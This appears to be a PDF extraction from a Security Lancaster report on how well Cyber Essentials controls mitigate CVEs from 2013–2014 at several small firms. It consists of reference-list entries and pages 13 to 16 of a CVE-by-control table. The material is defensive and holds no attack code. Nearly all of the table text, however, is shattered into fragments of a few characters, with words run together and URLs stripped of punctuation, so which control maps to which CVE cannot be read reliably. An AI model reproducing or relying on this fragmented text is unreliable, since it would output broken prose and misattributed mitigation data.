[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
